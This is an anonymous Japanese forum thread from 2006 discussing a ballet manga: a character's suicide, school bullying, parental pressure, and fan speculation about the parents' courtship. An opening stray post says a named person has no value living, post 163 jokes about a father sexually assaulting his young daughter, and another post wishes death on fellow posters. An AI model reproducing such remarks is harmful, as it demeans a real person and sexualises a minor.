562:ひよこ名無しさん :2006/05/01(月) 11:41:37 0

>>155大体、竹石圭佑ってまだ生きてんの?あれだけの事しといて…
あんなクズゲスは消えて無くなれば良いのに。生きてる価値無いよ絶対。ていうか存在自体が有害。

128 :花と名無しさん:2006/07/10(月) 11:38:47 ID:???0
>>120
よくわからんが、既出の感想は書くなといっているのか?
少なくともこのスレにはないんだから、そんなん知らんよ。
見たことある意見だと思うなら君がスルーすればすむ話。

129 :花と名無しさん:2006/07/10(月) 11:39:35 ID:???0
ごめん>>127のまちがいw

130 :花と名無しさん:2006/07/10(月) 11:40:39 ID:???0
>>126だった。。。ツッテクル

131 :花と名無しさん:2006/07/10(月) 11:45:56 ID:???0
さんざん外出の意見
・作者はテレプシ構想時から千花自殺を設定
・千花自殺の最大要因は踊れないことそのもので、虐めは副要因
・六花海外へ
・六花のお相手は拓人
・拓人大化けして本格的ダンサーに
・六花が悲しみを乗り越えて精神的に成長
・千恵子発狂

132 :花と名無しさん:2006/07/10(月) 11:48:44 ID:???0
馬子の「バレエだけが人生じゃないのに」という台詞に、
トガシーが「今なら、俺もそうと言えるけど」、馬子が相槌
という場面が少し気になった。

トガシーも馬子も、若い頃は千花のように思いつめる感じだったから
と捉えることもできる。
でも、駿が出てきた場面で、馬子が「自分を振り返る天才もいる」
発言にトガシーが複雑な表情をしていたのと繋がっていて、
トガシーにやはり過去に何かあったのかなと思わされたりもする。


133 :花と名無しさん:2006/07/10(月) 11:49:35 ID:???0
・9階から飛び降りて生還した窪塚はすごい

134 :花と名無しさん:2006/07/10(月) 11:53:26 ID:???0
>>131
ごくろうさん。
次スレが立った時には>>131が責任をもってテンプレとして貼るように。

135 :花と名無しさん:2006/07/10(月) 11:56:15 ID:???0
>>132
まぁね。
ドロたん、コッペリウス、ロッドバルド演る類いの男には、王子として
華々しい栄光があったダンサーという過去があって欲しいもんだわ。

136 :花と名無しさん:2006/07/10(月) 11:57:45 ID:???0
既出という名の言論統制^^;
きたちょうせn

137 :花と名無しさん:2006/07/10(月) 11:59:20 ID:???O
母親から過度の期待を受ける→娘死ぬ(自殺以外も含む)
て話、ギシ先生のお話にはいくつかありましたよね。

六花ちゃんは大成するんだろうけど(そのための踏み台が千花)、どんな感じに成長していくのかな。

138 :花と名無しさん:2006/07/10(月) 12:01:24 ID:???O
>>134
ねぎらったと思ったら次の要求。
お前は千恵子だろう!

139 :花と名無しさん:2006/07/10(月) 12:02:17 ID:???0
虐めは副要因、との事だけど、ただ無視されていた
だけじゃないと思うよ。バレコン直後から靴が壊れたり(壊された)
バレエバッグを失くしたり(隠された)背中や肘に怪我してきたり
(突き飛ばされた)肘の時にユキがどうしたのか聞いたら
「部活で..」って言いかけてたでしょ。ボランティアクラブなんて
運動系じゃないんだから怪我するなんておかしいよ。
結構ひどい虐めを受けてたんじゃないかと思う。

140 :花と名無しさん:2006/07/10(月) 12:02:42 ID:???0
さんざん続き

・×××が○○○○していたら、千花は死なずにすんだのに
 (例:千恵子が医学部進学を認めてあげていたら)
・手帳の字が汚くて萎え。でも作者精一杯の若者文字だからユルス。
・千花の幽霊がスタジオに
・来月号はいきなり時間が飛んでいる
・毛箱一切お咎めなし

141 :花と名無しさん:2006/07/10(月) 12:10:42 ID:???0
>>139
いや、べつに俺の意見じゃなくて、そういう意見が散々出てるって言ってるだけ。
ひとつの意見には、当然ながら反論も多数外出。意見と反論はデフォでセット。

142 :花と名無しさん:2006/07/10(月) 12:11:52 ID:???0
>>138
「ごくろうさん」はねぎらいの意味だけに使われるわけじゃないんだな。
「よくやるよ全く」の意味で使われる事も少なくない。


143 :花と名無しさん:2006/07/10(月) 12:13:03 ID:???O
千恵子まさかの妊娠→女児誕生
なんて展開ないかなぁ。

144 :花と名無しさん:2006/07/10(月) 12:14:04 ID:???0
千花死んじゃったからボランティア部でのイジメがどんなだったか
もう細かく描写されないのかな。千花死んだから回想シーンもなしか。

そ、そんなのは嫌だ、いやまだケバコがいるじゃないか、彼女が今までしてきた
事を語れば回想シーンでどんなイジメだったか見れる。

145 :花と名無しさん:2006/07/10(月) 12:15:34 ID:???0
虐め詳細は今後スルーってのも既出だよね。
是非ケバ子には報復をとか、詳細を明らかにしてくれって希望も既出。

146 :花と名無しさん:2006/07/10(月) 12:16:11 ID:???0
旦那が金子とできるってのもさんざん・・・w

147 :花と名無しさん:2006/07/10(月) 12:16:11 ID:???O
さんざんに便乗
・死体損傷話と「私の知っている死体あれこれ」、
「私の知っている自殺例あれこれ」
・自殺現場の資産価値について

「飛び…降…」の頃からループしてるよね

148 :花と名無しさん:2006/07/10(月) 12:16:59 ID:???0
>>139
靴は壊されたんじゃなくて「隠されて出てこなかった」んじゃないのか?

ボランティアクラブ(に所属してるのは確定だと思うんだよね。通知表に
所属クラブ記載はあるだろうし)の実態が明らかになるならそれと併せて
ユキの中学のダンスクラブで前の顧問がやめたいきさつ(「校長はそれが
望みと思ってた」と言ってたんで)も描いて欲しい。

学校のクラブってその時に学校にいる生徒のものであると同時に、代々
受け継いできた約束事やタブーというものも残ってるからその辺の話にも
興味あり。

149 :花と名無しさん:2006/07/10(月) 12:17:27 ID:???0
ループ慣れたので気にならないw

150 :花と名無しさん:2006/07/10(月) 12:22:13 ID:???0
お受験話もさんざん。
グロ画張るのもさんざん。
自分の娘がバレエ習ってるって話もさんざん。
さんざんのハナシにはうんざり。

151 :花と名無しさん:2006/07/10(月) 12:22:16 ID:???O
じゃ、
・ループ飽田。
(反論とセットで)

152 :花と名無しさん:2006/07/10(月) 12:22:25 ID:???0
金子先生って彼氏と別れたんだっけ。

153 :花と名無しさん:2006/07/10(月) 12:24:03 ID:???0
>>145
>詳細を明らかにしてくれって希望も既出。

148みたいな意見のことですねw

154 :花と名無しさん:2006/07/10(月) 12:25:31 ID:???0
>>152
いや、そういう話は出てないよ。晴れー金の人ね。
篠原家のことに振り回されて、彼氏とはどうなっちゃったのってのは
私も実は少し気になってた。

155 :花と名無しさん:2006/07/10(月) 12:25:40 ID:???O
せっかく受験して、遠くても無理して通ってた中学なのに、いじめられてたなんて千花は本当に運が…。
もう付属なんて言ってないで、地元の公立で良かったんじゃないの。高校受験で、堀越でも受ければ楽できたろうに。
堀越は、日舞や民謡の家元のお子さんも通ってるみたいだし、芸能コースは居心地良さそうだよ。

156 :花と名無しさん:2006/07/10(月) 12:27:21 ID:???0
いまさらそんな提案、死んだ子の年を数えるっていうような趣向ですな。>>155

157 :花と名無しさん:2006/07/10(月) 12:30:18 ID:???0
>>143
面白い意見だが、中学生の娘を挟んで川の字で寝てるから普通はセックスしないだろう。
よほどDQN親なら別だが。

158 :花と名無しさん:2006/07/10(月) 12:37:52 ID:???0
高額の手術もチカを追いつめたんだろうな。
趣味や小さい教室の講師程度のためにそこまでやらないだろうし。
下手でもなんでもとにかく踊りたい、と言う反面
自分のプライドが許さないのもあるけど
プロになれないと自分の価値もないし
周囲も許さないだろうっていうのはあるんだろうな。

バレリーナになるんだから中卒でも高校は通信でも良い、とかじゃなくて
わざわざエスカレーターの私立を選んでるんだから
怪我その他でバレエで食べられなくなった時のことも考えてるのか?と思ったんだけど。
それで医者発言を頭ごなしに否定されたら
「バレリーナ以外は駄目ならなんでこんな学校受験させたの?
一生懸命勉強してこんな辛い学校に行くのは何のため?」とか悩みそう。

159 :花と名無しさん:2006/07/10(月) 12:38:01 ID:???0
バレコンでいじめがエスカレートしたよね。
ケバ子視点でのバレコンでの出来事と言えば、
・千花が下手なのを期待したのに上手かった
・ワックスでミスした
・優勝候補の男の子を追い出した
の3つかな?
これを面白おかしく言いふらせば酷いいじめにも繋がるかもしれない。
自分はミスしたのにお母さんと優勝候補追い出して2の1、
やっぱり千花ってサイテー人間=いじめてよし、むしろ私たちが正義よ!みたいな
人は本当に酷いことを他人にする時は歪んだ正義感に凝り固まってることが多い。

(あくまでもケバコの目から見てということでケバ子擁護ではありません、念のため)

160 :花と名無しさん:2006/07/10(月) 12:38:19 ID:???O
利夫は欲求不満にならないのだろうか

161 :花と名無しさん:2006/07/10(月) 12:40:26 ID:???0
>>126
ずーっと張り付いてる人にはループ辛いだろうね。
ていうかホントに嫌ならNGワードにすればいいのに。
スレ伸びてるんだしある程度ループはしかたないと思うんだけど。

162 :花と名無しさん:2006/07/10(月) 12:42:36 ID:???O
>>143
千恵子の妊娠はある意味ホラーw
千恵子発病&発狂、死亡
利夫と金子が…
翌年、何故かチカ似の女の子誕生
金子とユキが小さい頃からバレエを叩き込むw
彼女が舞姫だったのです
おしまい

名前まで考えたかったな
休憩終わりで仕事に戻るわ

163 :花と名無しさん:2006/07/10(月) 12:43:10 ID:???0
千花自殺から気丈に頑張ってきた利夫の精神がついに壊れ、
隣で寝てる六花を侵してしまうのであった


どうだ初出だろうw

164 :花と名無しさん:2006/07/10(月) 12:44:24 ID:???0
ループループと騒いでいる奴が一番うざいし意味ないスレ消費してる件

165 :花と名無しさん:2006/07/10(月) 12:46:50 ID:???0
>>164
お前のレスも意味のないスレ消費だと思う。

166 :花と名無しさん:2006/07/10(月) 12:52:30 ID:???O
ループループ

一人トイレで処理する利夫カワイソス

167 :花と名無しさん:2006/07/10(月) 12:53:16 ID:???0
ループループ

>>166
そこで金子ですよ

168 :花と名無しさん:2006/07/10(月) 12:53:21 ID:???0
>>155
虐めが無くても遠距離通学だしバレエに忙しいし、チカとクラスメートの接点少なそう
ちょっとした誤解や、悪気無い感じ悪さなんかが解けることなく増幅しそう

169 :花と名無しさん:2006/07/10(月) 12:54:11 ID:???0
むしろトシオの年齢ならEDを気にするぐらいで、そんなに溜まらんだろ。こんな時だし。

170 :花と名無しさん:2006/07/10(月) 12:56:08 ID:???0
ループループ

wwwwwwwwwwwwwwwwww

171 :花と名無しさん:2006/07/10(月) 12:56:14 ID:???0
利夫に聞いてみたいねw
お嬢さんが亡くなられて四十九日になりますが、溜まります?

172 :花と名無しさん:2006/07/10(月) 12:57:52 ID:???0
いつまで3人並んで寝てんだろ。幼児みたいに。
華麗にスルーして海外編突入?

173 :花と名無しさん:2006/07/10(月) 12:58:41 ID:???0
ショボ公務員と社長令嬢のプリマ、どうやって知り合って恋愛して結婚したんだろ?
ちょっと興味ある。
利夫、千恵子に頭あがらなそうだし。

174 :花と名無しさん:2006/07/10(月) 12:59:31 ID:???0
>>173
これも既出ネタで、見合いだろって意見多数。
真偽のほどはシラネ。

175 :花と名無しさん:2006/07/10(月) 12:59:55 ID:???0
千恵子はプリマというほどじゃなかったんだってば

176 :花と名無しさん:2006/07/10(月) 12:59:56 ID:???0
ココに来ている泊瀬ババァが全員王子の簪でプスッとされて
丑寅の方へ逝きますように ナムナムナム

177 :花と名無しさん:2006/07/10(月) 13:00:56 ID:???0
お茶のお師匠さんやってればお金持ちの知り合いが多いから、息子の見合い相手
探すのはわけないよね。外出?

178 :花と名無しさん:2006/07/10(月) 13:01:03 ID:???0
>>175
「かつての君のプリマ姿・・・」
「私はあそこではプリマとは・・・」
って会話があったじゃん。

179 :花と名無しさん:2006/07/10(月) 13:01:07 ID:???0
>>117
亀でスマソ。
その姉妹が留学するとき、書道が得意(書道教室をやってたかも)な母親が、
「舞姫」って書いて持たせたらしい。留学先の部屋に貼ってあった。
中村姉妹のドキュメンタリー番組とテレプシ連載と、
どちらが先だったのか覚えていないが。

180 :花と名無しさん:2006/07/10(月) 13:01:47 ID:???0
疲れマラとかはアリかもしれんよ。

おばあちゃんが倒れたのって元々パパはユキ、ママはチカだったけど
フォローに回る役のパパが忙しくなって
様子のおかしいチカに気づきにくくなったっていうのもあるんだろうな。
金子は様子がおかしいチカを目の前に彼氏に手を振ってる間に見失うし。
金子マジックがチカには効かなかったんだね。
千恵子の手の内にある感じで手が出しにくいって言うのもあったんだろうけど。
「そっとしておいてください!」はもう見てられなかったのかな。GJと思った。

181 :花と名無しさん:2006/07/10(月) 13:01:56 ID:???0
>泊瀬ババァ

もうさんざんネタ

182 :花と名無しさん:2006/07/10(月) 13:03:44 ID:???0
なんか新しい話題出てこないかなあ〜と期待してたら、



としおさんのEDがせいぜいですかショボーン

183 :花と名無しさん:2006/07/10(月) 13:04:14 ID:???0
>>180
もともと他人の金子から見てもヲイヲイと思わせるほど、千恵子の母親としての
千花への接し方は拙かったってことだよね。

184 :花と名無しさん:2006/07/10(月) 13:04:57 ID:???0
としおさんお風呂上りには育毛剤。

185 :花と名無しさん:2006/07/10(月) 13:07:04 ID:???0
>>178
素人だったら、前に出て踊ってる女性はみんなプリマだろ。
兵器のことを知らん奴が、自走砲を見ても必ず戦車と呼ぶみたいなもんだ。

186 :花と名無しさん:2006/07/10(月) 13:07:35 ID:???0
六花への接し方も金子に突っ込まれてたよね。

187 :花と名無しさん:2006/07/10(月) 13:07:51 ID:???0
ソリスト程度だったのか、千恵子

188 :花と名無しさん:2006/07/10(月) 13:08:56 ID:???0
>>185
そりゃ確かにこれは戦車にしか見えんわ。
ww.tamiya.com/.../ list/35mm_img/35060m.jpg


189 :花と名無しさん:2006/07/10(月) 13:09:25 ID:???0
>>178
だから、そういってるんだってば

190 :花と名無しさん:2006/07/10(月) 13:10:10 ID:???0
あ、URL貼り間違った。
ttp://tamiya.com/japan/products/list/35mm_img/35060m.jpg
↑自走砲(但しプラモデル)

191 :花と名無しさん:2006/07/10(月) 13:10:31 ID:???0
>>182
ループループうるさい奴は、文句言ってるだけで新しい話題を振ってる
わけじゃないからね。
自分の好きな話題では自分からループしてたり。

192 :花と名無しさん:2006/07/10(月) 13:10:44 ID:???0
利夫さんもお金持ちのお坊ちゃんだったんでしょ?
茶道の先生は稼げるしコネも多いし、千恵子と結婚するのはなんも不自然じゃないよ。
喫茶店でもやろうとか考えるあたりもお坊ちゃんの発想。

193 :花と名無しさん:2006/07/10(月) 13:12:12 ID:???0
見合いかも知れないけど、友人の紹介とかも充分ありえるんでない?
行ってる学校(上の下程度のお嬢様学校)の友達とかがお茶を習ってたりとかありそうだし。
千恵子のバレエのチケットを義理で買ってくれた友達とか仲間が
公演に連れてきた、とかもあるかもしれないし。
職場、学校、偶然の出会い以外にもいろんな出会いってあるし。

194 :花と名無しさん:2006/07/10(月) 13:12:16 ID:???0
チャングムはチェジュ島で自殺しました。
後半は泣き虫ヨンセンの成長を見てください。

そのくらいの寂寥感だ、見てない人、ゴメン。

195 :花と名無しさん:2006/07/10(月) 13:13:32 ID:???0
身内に死なれたときって、性欲増進しない?
うわーっ、子孫繁栄しなきゃ!というスイッチが入るとかさ。
人間の場合は、夫妻子供に死なれた時は、
死んだ人に悪いから、と思って理性でブレーキかかりそうだけど。

196 :花と名無しさん:2006/07/10(月) 13:15:32 ID:???0
そこで喪服プレイですよ

197 :花と名無しさん:2006/07/10(月) 13:15:46 ID:???0
子孫繁栄本能が増大するのは、身内が死んだ時じゃなく自分が死にそうな時です。

198 :花と名無しさん:2006/07/10(月) 13:17:23 ID:???0
>>148
「横のところがパクッとあいてしまって学校指定の店まで
買いにいっていた」という千花ちゃんのセリフがあるけど
実は隠されていたのかもね。真相は分からないけど。

199 :花と名無しさん:2006/07/10(月) 13:17:25 ID:???0
金持ち、名家の没落てのもテーマの一つにあるんじゃないかな。
須藤家もそうだし。

200 :花と名無しさん:2006/07/10(月) 13:17:35 ID:???0
無駄な装飾のない喪服は、たしかに女性を綺麗に見せる。

201 :花と名無しさん:2006/07/10(月) 13:18:17 ID:???0
としおEDから動物の本能的生殖活動まで飛躍するなんて
元ネタ振った人も本望だろうなw

>>196
テレプシじゃなけりゃ山岸作品に出てきてもおかしくないシチュダネ。
でもテレプシはヤダw

202 :花と名無しさん:2006/07/10(月) 13:18:28 ID:???0
>>200
キモイ

203 :花と名無しさん:2006/07/10(月) 13:19:00 ID:???0
娘たちには正座をさせない、ときっぱりという千恵子が
茶道の先生の息子と見合いで結婚するかな。
嫁と言う立場になるだけでも、じゃ、千恵子さんにもお茶教えてあげるから
やりなさいよなんて言われかねないし、当然生まれるだろう子にもそういわれるだろう。
千恵子には魅力的ではなさそう。なので一応恋愛に一票。

204 :花と名無しさん:2006/07/10(月) 13:20:38 ID:???0
利夫と恋愛ねえ。

205 :花と名無しさん:2006/07/10(月) 13:21:54 ID:???0
読み返していると頑張ってバレエにいそしむチカちゃんの姿を見るよりも
表紙や扉絵のチカモデル大人バージョンの絵を見る方がこたえるな・・・。

彼女の人生は途中でぶった切りなんだから

それにしてもそろそろ背も伸びて来たんだし
ユキのツインテールはおかしい。

206 :花と名無しさん:2006/07/10(月) 13:22:02 ID:???0
いや、そもそも、うちひしがれた千恵子に欲情するかどうかがポイントで。

207 :花と名無しさん:2006/07/10(月) 13:22:12 ID:???0
祖母ちゃんはお茶で、利夫はコーヒーなんだよね。
利夫は洋物に憧れていたのだなぁ。

208 :花と名無しさん:2006/07/10(月) 13:23:03 ID:???0
>>203
その道のプロだからこそお祖母ちゃんもわかってくれると思う。
私の知ってる先生は膝は消耗品だからと普段は全く正座しないw
正座って膝に悪いんだよ。

209 :花と名無しさん:2006/07/10(月) 13:24:18 ID:???0
むしろ性欲が増進されるのは金子じゃないかな。
それで妊娠→ねえやは嫁にゆき

210 :花と名無しさん:2006/07/10(月) 13:24:23 ID:???0
利夫だって昔は痩せてたから恋愛してても不思議じゃない

211 :花と名無しさん:2006/07/10(月) 13:26:08 ID:???0
>>206
うちひしがれた姿はあまりにも弱々しくみえた
抵抗できないくらいに

みたいなのあったね、そういや。

212 :花と名無しさん:2006/07/10(月) 13:26:45 ID:???0
利夫は裏坂口じゃないかなカオも似てるし。
茶道に反発してオサレな喫茶店経営を夢見るが結局公務員に落ち着いたドラ息子。
とかだったら面白い。

213 :花と名無しさん:2006/07/10(月) 13:27:14 ID:???0
キェーッですか。

214 :花と名無しさん:2006/07/10(月) 13:31:00 ID:???0
>>212
俺は貝塚先生とパパが同じ顔だと思ってたw

215 :花と名無しさん:2006/07/10(月) 13:31:32 ID:???0
>>208
だって篠婆は孫に教えるを楽しみにしてたんだよ。

216 :花と名無しさん:2006/07/10(月) 13:32:23 ID:???0
いい年になっても彼女の一人もできない利夫に焦った両親が、
お弟子さんから知り合いのお嬢さんとして紹介されたのが千恵子。
見合いは意外に上手く行ったが、茶道の話を振る利夫母に、「私は
バレエをやっていますので正座は絶対にできないんです」と、のっけ
からピシャリと言い放つ千恵子。その有無を言わせぬキツイ物言いに、
利夫母は少々悪感情を抱く。それでも利夫のほうが千恵子の踊る姿を
見て惚れ込んでしまい、両親の若干の不満を他所に結婚準備は着々と
調うのであった。

217 :花と名無しさん:2006/07/10(月) 13:34:48 ID:???0
千恵子紹介したお弟子さん立場ないな。

218 :花と名無しさん:2006/07/10(月) 13:35:22 ID:???0
ないなw

219 :花と名無しさん:2006/07/10(月) 13:36:16 ID:???O
>>158
>高額の手術もチカを追いつめたんだろうな。

これはあんまりだと思う。

出来ることなら何でもしてやろうという気持ちもわかるよ。

220 :花と名無しさん:2006/07/10(月) 13:37:07 ID:???0
私が篠原祖母なら弟子のなかから気立てのよい娘を
選んで利夫と見合いさせるね。

221 :花と名無しさん:2006/07/10(月) 13:37:47 ID:???0
ゆきちゃんの髪型、いまどきの中学生にいないよねー。

222 :花と名無しさん:2006/07/10(月) 13:38:21 ID:???0
善意が裏目に出るつーのも、世の中良くあること。158じゃないけど。

223 :花と名無しさん:2006/07/10(月) 13:39:56 ID:???0
>>219
158だけど「結果的に」ってことだよ。
もちろん全てを投げ打ってできることをしてやった、ってのは分かるけど
それを受け止められない時もあるでしょ。

周囲や親が犠牲になって沢山のものをつぎ込んでくれたが為に
リタイヤしたくともできなくなるってこと世の中には結構あるわけだし。
千恵子を攻めてるわけじゃなくて
結果論でってこと。

224 :花と名無しさん:2006/07/10(月) 13:39:56 ID:???0
多分体型のせいで利夫がもてないって話になってると思うが、
男性の場合は女性と違い、太り気味だからといってもてないわけじゃない。
利夫は癒し系のモテ男。

225 :花と名無しさん:2006/07/10(月) 13:40:45 ID:???0
>>220
それ、「ご縁が無かったものと・・・」だったら気まずくならね?

226 :花と名無しさん:2006/07/10(月) 13:40:46 ID:???0
>>220
「御茶姫」チャセンノコーラ
だったらなぁ
千花ちゃんも死なずに済んだのに

227 :花と名無しさん:2006/07/10(月) 13:40:51 ID:???0
>>174
いや恋愛だとオモワレ。
利夫いいとこのぼんぼんだから、学生時代の男友達の彼女が
バレエやってたとかそんな感じ。

228 :花と名無しさん:2006/07/10(月) 13:43:18 ID:5aPpAb2o0
篠原パパはデブでもてるとは思えないけど、

229 :花と名無しさん:2006/07/10(月) 13:44:24 ID:???0
>>223
ワカリマス。
「親にこんなにお金遣わせたのに」っていう気持ちは、
賢いチカのプレッシャーになっただろう。誰が悪いとかではなく。

230 :花と名無しさん:2006/07/10(月) 13:45:13 ID:???0
>>227
利夫千恵子のナレソメなんて描かれることもマズ無いと思うから、見合い恋愛の
決着がつくわけない。
ループの話題も秋田から、どんな恋愛だったのか詳細書いてよ。

231 :花と名無しさん:2006/07/10(月) 13:45:35 ID:???0
でも六花も千花もバレエやめるのときとかちょっとくらい茶道に触れられたら良かったのに。
正座の問題はそりゃああるけど別の「美」に触れるのも悪くないし、視野が広がるよ。
千花のときはおばあちゃん悪くなってたからそれも無理か。

232 :花と名無しさん:2006/07/10(月) 13:46:08 ID:???O
>>223
結果的に、ね…。
結局全てが裏目に出ちゃったんだよなー。


後から言えばあれも重荷、これも重圧とはなんとでも言える。

233 :花と名無しさん:2006/07/10(月) 13:47:31 ID:???O
>>228
一巻の頃は痩せててイケメンだったのよ。

234 :花と名無しさん:2006/07/10(月) 13:48:06 ID:???0
>>「御茶姫」チャセンノコーラ
まるで知らない世界なんで違ってたら悪いんだけど、茶道の世界で
真剣に悩んだりとかもあるのか?>茶道関係者
イメージ的には公務員の出世みたいなもんだと思うんだが。
(基本的に年功序列。あとは盆暮れ付け届けの多寡)

235 :花と名無しさん:2006/07/10(月) 13:48:42 ID:???0
清潔感のあるデウ゛はモテるよ。

236 :花と名無しさん:2006/07/10(月) 13:49:38 ID:???0
>>225
ん、なるかも。でも、教えることでその女性がどんな人か多少は
わかるでしょ。見合いって感じにしなくともお茶会でも開いて
息子も出席させるとかしたらどうかな。

237 :花と名無しさん:2006/07/10(月) 13:51:26 ID:???0
ゆきちゃんとイヨってそっくり。また、王子と金子先生もそっくり。

238 :花と名無しさん:2006/07/10(月) 13:52:11 ID:???0
>>236
わかったから、もういいよ

239 :花と名無しさん:2006/07/10(月) 13:52:47 ID:???0
>>234
あるレベルまではけっこう実力社会だと思う(厳しいよ)
それを越えるとカネコネお道具、
それを超えると社会性とカリスマ性とセンスとやっぱ実力?
私も習い事でしてるだけだから上のことまでわからん。

240 :花と名無しさん:2006/07/10(月) 13:53:16 ID:???0
女性は基本的に柔らかいものが好き(ぬいぐるみなど)だから、
それを男性に求める人もいる。

241 :花と名無しさん:2006/07/10(月) 13:53:17 ID:???0
>>232
そこもバレエの悲劇じゃないかな。
まだ方向性の固まらない子供にあまりにつぎ込むのは危険だけど
勝負の時期が早いから。
青田買いの他の日本のスポーツもそうだし。
そして外国みたいに「体型や能力が活かせる」ところに身を置くって前提で
途中でそこに合わなくなったら他に生きる道を探すとかじゃなくて
日本人だとやりたいこととか、ずっとやり続けてきた事に固執する部分があると思う。

242 :花と名無しさん:2006/07/10(月) 13:55:08 ID:???0
おまいら利夫パパのことデブとか言ってるけど、
1巻見たらスラッとしてたぞ。特に顔が。
この1〜2年で急激にキタんだと思われる。詐欺だ。

243 :花と名無しさん:2006/07/10(月) 13:56:25 ID:???0
ストレス太りだね、とし

244 :216:2006/07/10(月) 13:57:05 ID:???0
千恵子の方はといえば、そもそも結婚に興味は無かった。
唯一興味が有ったのはバレエだけなのだから。
その千恵子ももう24歳。クリスマスケーキという言葉が
脳裏をよぎる。
バレエの王子様達は奪い合いのようになっていた。
しかもいとも簡単に王子様から捨てられてしまう友人達を見て、
千恵子は「同じ世界からは伴侶は選ぶまい。安心できる人がいい」と
老獪な知恵を身につけるに至っていた。
そんな千恵子に降って沸いたのが利夫との見合い話だった。
初対面の印象は「別に悪くはない」。正直、好きでもなかった。
しかし、親の薦めと俊夫の情熱で、結婚は本決まりになった。

245 :花と名無しさん:2006/07/10(月) 13:58:03 ID:???0
カレー好きな俺としては利夫のカレーが食べてみたい

246 :花と名無しさん:2006/07/10(月) 13:58:13 ID:???0
>>232
>後から言えばあれも重荷、これも重圧とはなんとでも言える。

こじつけの重圧じゃなくて、チカの場合は真性の重圧背負ってない?

247 :花と名無しさん:2006/07/10(月) 13:59:36 ID:???0
1巻で千恵子は六花を医者に連れて行って、
股関節が理想的に開かないことを、六花に突きつけたよな。
んで、六花にバレエを辞めさせようと思ってたんじゃないかな。
(辞めさせようとは行動しなかったような)
そういうシビアでキッツイリアリストな千恵子なんだから、
三度目の手術失敗でこれが限界だと諦めるような気がするが。
生体移植で失敗してもまだ頑張れ、てのは千恵子らしくないなあと思った。


248 :花と名無しさん:2006/07/10(月) 13:59:39 ID:???0
>バレエの王子様達は奪い合いのようになっていた。

バレエの王子さま、奪い合わないよ。収入、不安定。

249 :花と名無しさん:2006/07/10(月) 14:01:54 ID:???0
>>247
アレは医者に言われてなりゆきで六花に話を聞かせる展開になってしまった。
最初は聞かせるつもりじゃなかったし、聞かせたことも悔やんでいた。

250 :花と名無しさん:2006/07/10(月) 14:01:55 ID:???0
千恵子のシビアな性格がちかを自殺に追いやったってこと?

251 :花と名無しさん:2006/07/10(月) 14:02:18 ID:???0
>>239
なるほど。ありがたう。
少なくとも239さんは厳しい実力社会にいるわけですね。がんがってね。

252 :花と名無しさん:2006/07/10(月) 14:02:31 ID:???0
>>247
ショックを突きつけることになるから、面会させないようにしてたよ。
でも医者に「娘さんも一緒に」とか言われて結果的に…

253 :花と名無しさん:2006/07/10(月) 14:02:32 ID:???0
>>248
佐々木倫子のバレエ漫画思い出した。
研究所の跡取り息子、玉の輿に乗ってプリマの座もゲット
みたいな。

254 :花と名無しさん:2006/07/10(月) 14:02:43 ID:???0
バレエの王子さまって実家金持ちじゃないの?
そうでなきゃ親だったらそんな道にすすませられない。

255 :216:2006/07/10(月) 14:03:37 ID:???0
>>248
アラ、そ。王子様もてないのかw

256 :花と名無しさん:2006/07/10(月) 14:04:21 ID:66KPvkDt0
へぇ

257 :花と名無しさん:2006/07/10(月) 14:06:19 ID:???0
「うちにお金が無いから生体手術は無理。気の毒だけどあきらめてね、千花」

ということになって千花が「カクン」となる膝を抱えきれず自殺したとしても、
「あの時金だしてやらなかったのはまずかった」とか
言われそうなんだよね。

258 :花と名無しさん:2006/07/10(月) 14:08:01 ID:???0
>>255
カッコよくて、実家が超金持ち(←ココが重要)だったらモテルよ。

259 :花と名無しさん:2006/07/10(月) 14:08:56 ID:???0
千恵子と利夫の馴れ初め・・・
やっぱり上の方で言ってた人がいたけど、友人の紹介だと思うな。
利夫のお坊ちゃん大学の友人が、千恵子の友人のバレリーナと
つきあってて、その関係で合コンでもしたんだよ。
利夫はきれいなバレリーナで、母にも似た性格の千恵子に、
ぐっときて地味にアピール。千恵子はお見合いを重ねていて、
バレエに理解協力してくれそうな男を見る目が
けっこう肥えていたので、地味に気を利かせる利夫に興味。
利夫が家事をまめまめしくするタイプなのが決め手になって、
お付き合いして結婚。

260 :花と名無しさん:2006/07/10(月) 14:09:18 ID:???0
>>258
バレリーナは超現実的な恋愛をしますな。

261 :花と名無しさん:2006/07/10(月) 14:09:22 ID:???0
>>257
とりあえず、私だったら言わない
チカ、わがまま、弱すぎ、甘えてる、とか書き込んでるト思う

262 :花と名無しさん:2006/07/10(月) 14:10:29 ID:???0
性格美形・利夫

263 :花と名無しさん:2006/07/10(月) 14:10:41 ID:???0
>>246
あとから「チカの気持ちはこうだったかもね」という議論なわけであって
しなければよかったのに、とか言ってるわけじゃないじゃん。


264 :216:2006/07/10(月) 14:10:49 ID:???0
>利夫のお坊ちゃん大学の友人が、

利夫、実は慶應・青学系とかねえ。
今ほど難しくはないだろうけど、県庁もバカじゃ絶対に入れない。

265 :花と名無しさん:2006/07/10(月) 14:13:28 ID:???0
>>259
ワハハワロタ

外伝にしたってマンガになりゃしないけど、想像できる。

266 :花と名無しさん:2006/07/10(月) 14:14:14 ID:???0
俊夫父は何をしてた人だろ

267 :花と名無しさん:2006/07/10(月) 14:15:04 ID:???0
千恵子と利夫母の性格が似てるってのは、マンガの中に出てきてるよな。
きつい性格の女にぐいぐいやられるのが好きな利夫。

268 :花と名無しさん:2006/07/10(月) 14:15:36 ID:???0
来月は数年後に飛ぶかな。

チカ死んでしまった以上、この頃のゆきグダグダ執拗に描かれたら
ちょとついてけないかも。

思い切って、飛んで欲しい。或いはクミ編?いやそれはないか。

269 :花と名無しさん:2006/07/10(月) 14:15:40 ID:???0
>266
さあ。普通にリーマン


270 :花と名無しさん:2006/07/10(月) 14:16:47 ID:???0
>>268
ティーブレイク的に千恵子利夫ナレソメ編w

271 :花と名無しさん:2006/07/10(月) 14:16:51 ID:???0
いきなりクミ編、あってもいいな。
「んで、ユキはどうしちゃったのさ・・」という心配を3年くらい放置w

272 :花と名無しさん:2006/07/10(月) 14:17:34 ID:???0
>>266
いいとこのぼんぼんか、かなりの有力者だとオモワレ。

利夫母の茶道充実っぷりからすると、
かなり金持ってて、地位持ってないとやってけない。

273 :花と名無しさん:2006/07/10(月) 14:18:36 ID:???0
>>269
それはなさそう

274 :花と名無しさん:2006/07/10(月) 14:19:00 ID:???0
>>270
絵的に地味だから、若いころの貝谷先生や鳥山&富樫が出てくればもつかな。
中学生のゴッシーや金子せんせいも絡めれば楽しめる。

275 :花と名無しさん:2006/07/10(月) 14:19:08 ID:???0
後から見れば、
三回の手術も、F中受験も、親がバレエの先生で家にスタジオがあることも、
ひとつ下の妹もバレエをやってることも、美人な顔ですら
重圧になると思うよ。

